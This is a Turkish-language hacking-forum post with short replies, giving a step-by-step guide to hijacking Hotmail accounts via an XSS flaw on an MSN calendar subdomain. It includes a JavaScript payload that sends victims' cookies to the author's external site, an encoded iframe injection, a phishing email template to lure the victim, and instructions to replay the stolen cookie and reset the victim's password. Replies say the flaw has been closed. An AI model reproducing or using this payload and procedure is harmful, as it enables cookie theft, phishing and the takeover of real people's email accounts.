msn hackle xss açığı ile+resimli anlatım

[Tilki_Andre]

Mail Hack’in en qüzel yöntemlerinden olan Hotmail XSS açığını anlatalım..

Öncelikle dosyalarımızı rar’a attığım şekilde kendi hostumuza atıyoruz..Ve bu dosyaları kendi sitemize qöre editliyoruz.. ama ilk önce dosyalar arasında "c.js" var.. bunu not defterinde açın ve ;

i=new/**/Image();i.src= "http://www.volqan.org/portal/sistem/s.php? +">i=new/**/Image();i.src= "http://www.volqan.org/portal/log.php? +">

şu kısmı bulup " voLqan.Org " linkini kendi sitenizin adıyla editleyin ve bu şekilde kaydedin.. Daha sonra tüm dosyaları rar’ladığım şekilde hostunuza atın.. Detaya inmek istiyorum dosyanın içinde log.php dosyasını yani portal/system/log.php’yi kendinize qöre editleyebilirisiniz.. Mesela orda snif’ten cookie bilqilerini almak için kullanıcı adı ve şifre " admin - voLqan " şeklinde.. Yani ;

$kullaniciadi = "admin";
$sifre = "voLqan";

bunu kendinize qöre uyarlayabilirsiniz.. Böylece cookie’leri aldığınız log sayfası yalnızca size ait olur ve her qirişte " kullanıcı adı - şifre " ister..

Bu dosyamızı da kendimize qöre ayarladıktan sonra sıra qeldi XSS’mizi kullanmaya.. Bu XSS’i kendi sitemde " portal " klasörüne kurduğumu düşünürsem, kurbana yollayacağım link ; www.volqan.org/portal olacaktır.. Çünkü o klasöre attığım index.html’deki kod yani ;

**********document.write(’<iframe name="I1" src= "a target=_blank href=http://calendar.msn.com/tasks/isapi">http://calendar.msn.com/tasks/isapi.dll?request=action&operation=expandcollapse& objectID=0&itemOldStatus=0&httpFrom=“><%53%43%52%4 9%50%54%20%53%52%43%3D%68%74%74%70%3A%2F%2F%77%77% 77%2E%6B%67%73%63%65%6E%74%65%72%2E%6F%72%67%2F%70 %6F%72%74%61%6C%2F%63%2E%6A%73><%2F%53%43%52%49%50 %54>" height="1" width="1" border="0" frameborder="0" marginwidth="1" marginheight="1" style="position: absolute; left: 0; top: 0"> hi</iframe>’)

window.status=" "

</script>

bu kod kurban’ın bu sayfayı qörmesi halinde cookie bilqilerinin elime qeçmesini sağlayacaktır..

kurbanımı seçiyorum ve ona kendi mail hesabımdan şöyle bir mail qönderiyorum..

Konu : yeni portal nasıl olmuş

Kimden : [email protected]

Konu : merhaba arkadaşım voLqan.Org’a qüzel bir portal kurdum seninde yorumlarını bekliyorum.. www.volqan.org/portal Sağ alt taraftaki kategoriye iyi baq seninde adın qeciyor.. Teşekkürler..

qibisinden kurbana mailimi yolluyorum

Kurbanımız bu iletiyi alıp verdiğim linke qirdiği anda yani Hotmail box’ı açık iken www.volqan.org/portal kısmına qirdiği anda Cookie’leri bizim log’umuzda beliriyor

ve bende hemen www.voLqan.Org/portal/sistem/log.php? adresime qidip cookie’leri kontrol ediyorum..

ve qördüğünüz qibi kurbanın cookie bilqileri qelmiş şimdi ordaki KOPYALA kutucuğunu tıklaıp cookie’i kopyalıyorum ve proxomitron proqramıma qirip son ayarlarımı yapıyorum
http://img295.imageshack.us/img295/4183/sniffzv5.jpg







ve son olarak proxy ayarlarını yaptıktan sonra aldığımız cookie ile

http://by103fd.bay103.hotmail.msn.co...hmhome?fti=yes

linkinden kurbanın mailine qiriş yapıyoruz..Şifreyi kendimize qöre ayarlamak içinde www.passport.com dan şifre resetleme linkini yolluyoruz ve mail box açıkken şifreyi resetleyip kendimize qöre ayarlıyoruz..

Proxomitron Download

Hotmail XSS Dosyaları Download

işte Hotmail XSS mevzusu bundan ibaret..Yalnız Hotmail XSS acığı kapandı qibi laflar ortada dolaşıyor.. Hotmail’de XSS bulmak bizim elimizde yani mesela bu verdiğim XSS acığı calendar.hotmail..’den kaynaklanıyor ama hotmail’de bir sürü sub var ve bu sub’larda bir sürü XSS acığı mevcut her qeçen qün ayrı bir sub’da XSS bulunuyor ve bizde bunu mail hack olarak kullanıyoruz..

[asityanigi]

bu acık kapatıldı

[ege42_06]

ewt xss kapandı

[qarizma]

alıntımı yaptın eğer yaptıysan yazının altına ALINTI'dır die eklermisinn !